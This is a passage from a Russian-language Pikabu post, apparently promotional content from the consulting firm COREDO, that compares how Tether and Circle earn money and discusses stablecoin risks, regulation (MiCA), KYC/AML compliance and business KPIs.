Таким образом, для комплексной оценки устойчивости важно учитывать не только внутренние механизмы эмитента, но и внешние макроэкономические факторы, такие как динамика процентных ставок и инфляция.

Влияние процентных ставок и инфляции

Доходность стейблкоинов напрямую зависит от процентных ставок ФРС и макроэкономических факторов. Рост ставок увеличивает доходы Tether и Circle, но одновременно повышает требования к качеству резервов и управлению рисками. Инфляция и волатильность на рынках могут привести к ограничению эмиссии и снижению прибыльности, особенно в условиях ужесточения регулирования.

Практика COREDO показала: для долгосрочной устойчивости бизнеса необходимо внедрять инструменты хеджирования процентных и валютных рисков, а также регулярно пересматривать стратегию управления резервами с учетом изменений рыночной капитализации и требований регуляторов.

Снижение доверия: последствия для рынка

Снижение доверия к эмитенту, сценарий, который может реализоваться при недостаточной прозрачности, проблемах с выкупом токенов или выявлении несоответствия структуре резервов. Для Tether это означает потенциальные оттоки капитала и усиление давления со стороны регуляторов. Для Circle, риски связаны с возможными сбоями в партнерской инфраструктуре и изменениями в распределении доходов.

Ключевое конкурентное преимущество Tether, масштаб и ликвидность, но долгосрочная устойчивость требует адаптации к новым стандартам прозрачности и корпоративного управления. Сравнение с традиционными управляющими активами, такими как BlackRock, подчеркивает: институциональный спрос на прозрачные и устойчивые стейблкоины будет только расти.

Tether или Circle - что выбрать?

Как на самом деле зарабатывают Tether и Circle. Невидимая печатная машинка на 13 миллиардов долларов Развитие, Статья, Биткоины, Длиннопост

Вопрос Tether или Circle, что выбрать? волнует всех, кто ищет стабильность и надежность в мире стейблкоинов. Чтобы сделать осознанный выбор, важно разобраться в ключевых параметрах и показателях каждого из проектов: от капитализации и прозрачности до уровня регулирования и особенностей использования.

Риски и применение стейблкоинов для бизнеса

Риски и применение стейблкоинов для бизнеса, это не только новые возможности для управления активами и расчетов, но и важные вопросы доверия, регуляции и стабильности. Прежде чем интегрировать такие инструменты в бизнес-процессы или рассматривать их для инвестиций, следует внимательно оценить ключевые риски и параметры выбора подходящего стейблкоина.

Как выбрать стейблкоин для инвестиций

Оценка надежности эмитента - первый шаг при интеграции стейблкоинов в корпоративные процессы. Критерии выбора включают прозрачность резервов, наличие независимого аудита, соответствие институциональным стандартам отчетности и качество партнерской инфраструктуры.

Команда COREDO рекомендует запрашивать у эмитента регулярные отчеты о резервах, подтвержденные аудиторами из Big Four, а также анализировать структуру активов и механизмы выкупа токенов. Для компаний, работающих в ЕС и Азии, соответствие требованиям MiCA и локальных регуляторов становится обязательным.

Комплаенс и KYC/AML для бизнеса

Внедрение стейблкоинов требует выстраивания внутренних комплаенс-процедур, автоматизации KYC/AML и интеграции финансового комплаенса на всех этапах работы с токенами. Решение, разработанное в COREDO, позволяет автоматизировать мониторинг транзакций, снизить риски несоответствия и повысить эффективность взаимодействия с банками и институциональными партнерами.

Для корпоративных клиентов важно не только соответствовать требованиям регуляторов, но и выстраивать процессы так, чтобы минимизировать транзакционные издержки и повысить прозрачность операций.

Метрики и KPI внедрения стейблкоинов

Ключевые метрики эффективности включают:

  • ROI внедрения стейблкоинов в корпоративные платежи

  • Снижение транзакционных издержек по сравнению с традиционными инструментами

  • Уровень ликвидности и скорость выкупа токенов

  • Доля операций, соответствующих требованиям KYC/AML и комплаенса

  • Регулярность и качество аудита резервов

Практика COREDO показывает: интеграция этих метрик в корпоративную отчетность позволяет не только повысить эффективность работы, но и минимизировать стратегические риски при масштабировании бизнеса.

Ключевые инсайты для бизнеса и руководителей

  • Бизнес-модели Tether и Circle демонстрируют разные подходы к балансу прибыльности и прозрачности. Tether фокусируется на максимизации доходов за счет минимальной прозрачности, Circle: на институциональной устойчивости и комплаенсе.

  • Регулирование (прежде всего MiCA в ЕС) становится определяющим фактором для долгосрочной устойчивости и конкурентоспособности эмитентов. Компании, выбирающие стейблкоины для корпоративных платежей, должны учитывать не только текущую доходность, но и риски, связанные с изменением регуляторной среды.

  • Критически важны регулярный аудит резервов, прозрачность структуры активов и внедрение комплаенс-процедур, соответствующих международным стандартам. Это минимизирует риски несоответствия и повышает доверие со стороны партнеров и регуляторов.

  • Интеграция стейблкоинов в корпоративные процессы требует стратегического планирования, оценки ROI и внедрения метрик эффективности. Решения, реализованные командой COREDO, позволяют не только снизить издержки, но и обеспечить долгосрочную устойчивость бизнеса в условиях быстро меняющейся финансовой экосистемы.

Если вы планируете масштабировать бизнес в ЕС, Азии или Африке, интегрировать стейблкоины в корпоративные процессы или получить финансовую лицензию, опыт COREDO и наши комплексные решения помогут выстроить эффективную и безопасную инфраструктуру, соответствующую требованиям завтрашнего дня.

Показать полностью 5
[моё] Развитие Статья Биткоины Длиннопост
1
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии